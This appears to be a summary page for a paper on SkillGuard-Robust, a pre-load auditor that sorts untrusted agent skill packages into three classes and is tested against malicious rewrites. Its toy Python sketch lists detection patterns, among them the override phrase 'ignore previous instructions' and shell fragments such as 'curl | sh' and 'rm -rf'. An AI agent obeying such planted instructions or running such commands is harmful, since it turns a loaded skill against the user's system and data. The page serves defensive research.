Structured Security Auditing and Robustness Enhancement for Untrusted Agent Skills

📄 Abstract

Agent Skills package SKILL.md files, scripts, reference documents, and repository context into reusable capability units, turning pre-load auditing from single-prompt filtering into cross-file security review. Existing guardrails often flag risk but recover malicious intent inconsistently under semantics-preserving rewrites. This paper formulates pre-load auditing for untrusted Agent Skills as a robust three-way classification task and introduces SkillGuard-Robust, which combines role-aware evidence extraction, selective semantic verification, and consistency-preserving adjudication. We evaluate SkillGuard-Robust on SkillGuardBench and two public-ecosystem extensions through five large evaluation views ranging from 254 to 404 packages. On the 404-package held-out aggregate, SkillGuard-Robust reaches 97.30% overall exact match, 98.33% malicious-risk recall, and 98.89% attack exact consistency. On the 254-package external-ecosystem view, it reaches 99.66%, 100.00%, and 100.00%, respectively. These results support a bounded conclusion: factorized package auditing materially improves frozen and public-ecosystem robustness, while harsher external-source transfer remains an open challenge.
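The three stages named in the abstract can be pictured with a toy sketch. This is not the paper's implementation: the label names (`benign`, `suspicious`, `malicious`), the file-role rules, the keyword patterns, and every function name below are hypothetical, chosen only to illustrate how role-aware extraction, selective verification, and a deterministic adjudication step might fit together.

```python
from dataclasses import dataclass
from enum import Enum


class Verdict(Enum):
    # Hypothetical three-way label set; the abstract does not name the classes.
    BENIGN = "benign"
    SUSPICIOUS = "suspicious"
    MALICIOUS = "malicious"


@dataclass
class Evidence:
    path: str
    role: str
    snippet: str
    severity: int  # 1 = ambiguous, 2 = clearly dangerous (assumed scale)


# Illustrative patterns only; a real auditor would need far richer signals.
HARD_PATTERNS = ("curl ", "| sh", "rm -rf", "base64 -d")
SOFT_PATTERNS = ("ignore previous instructions", "do not tell the user", "api_key")


def file_role(path: str) -> str:
    """Assign a coarse role to each file in the package (assumed roles)."""
    if path.endswith("SKILL.md"):
        return "manifest"
    if path.endswith((".sh", ".py", ".js")):
        return "script"
    return "reference"


def extract_evidence(package: dict[str, str]) -> list[Evidence]:
    """Role-aware extraction: hard patterns only count inside scripts."""
    evidence = []
    for path, text in package.items():
        role = file_role(path)
        for line in text.splitlines():
            lowered = line.lower()
            if role == "script" and any(p in lowered for p in HARD_PATTERNS):
                evidence.append(Evidence(path, role, line.strip(), 2))
            elif any(p in lowered for p in SOFT_PATTERNS):
                evidence.append(Evidence(path, role, line.strip(), 1))
    return evidence


def verify(item: Evidence) -> bool:
    """Stand-in for semantic verification; a real system might query a model."""
    return item.role in ("manifest", "script")


def audit(package: dict[str, str]) -> Verdict:
    """Adjudicate from the evidence set alone, so the verdict is deterministic."""
    evidence = extract_evidence(package)
    if any(e.severity == 2 for e in evidence):
        return Verdict.MALICIOUS
    # Selective verification: only ambiguous items reach the verifier.
    if any(verify(e) for e in evidence):
        return Verdict.SUSPICIOUS
    return Verdict.BENIGN
```

For example, `audit({"SKILL.md": "Helper", "scripts/install.sh": "curl http://example.invalid/x | sh"})` returns `Verdict.MALICIOUS` in this sketch, because the hard pattern appears in a file whose role is `script`. Keyword matching of this kind is exactly what semantics-preserving rewrites defeat, which is why the abstract pairs extraction with a verification stage.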


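1️⃣ One-Sentence Summary

This paper proposes SkillGuard-Robust, a system that audits agent skill packages before they are loaded, using cross-file role-aware evidence extraction, semantic verification, and consistency-preserving adjudication. It recasts security auditing from simple single-prompt filtering as a robust three-way classification task. Experiments show that the method withstands malicious rewrite attacks and exceeds 97% security detection accuracy across multiple datasets.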
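The abstract reports three metrics without defining them. The sketch below shows one plausible reading, and every definition in it is an assumption: exact match as plain label accuracy, malicious-risk recall as the share of gold-malicious packages predicted malicious, and attack exact consistency as the share of attack groups (an original package plus its rewrites) in which every variant is labeled correctly. The function names and the `group_ids` argument are hypothetical.

```python
from collections import defaultdict


def exact_match(preds, golds):
    """Fraction of packages whose predicted label equals the gold label."""
    return sum(p == g for p, g in zip(preds, golds)) / len(golds)


def malicious_recall(preds, golds, positive="malicious"):
    """Assumed definition: recall restricted to gold-malicious packages."""
    hits = [p == positive for p, g in zip(preds, golds) if g == positive]
    return sum(hits) / len(hits)


def attack_exact_consistency(preds, golds, group_ids):
    """Assumed definition: a group counts only if all its variants are correct."""
    groups = defaultdict(list)
    for p, g, gid in zip(preds, golds, group_ids):
        groups[gid].append(p == g)
    return sum(all(flags) for flags in groups.values()) / len(groups)


# Toy data: group "a" holds an attack and one rewrite that slips through.
golds = ["malicious", "malicious", "benign", "malicious"]
preds = ["malicious", "benign", "benign", "malicious"]
group_ids = ["a", "a", "b", "c"]

print(exact_match(preds, golds))                          # 0.75
print(attack_exact_consistency(preds, golds, group_ids))  # 2 of 3 groups
```

Under these assumed definitions a single missed rewrite lowers exact match by one package but fails its whole group on the consistency metric, which is what makes a group-level score a stricter test of robustness to rewriting.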
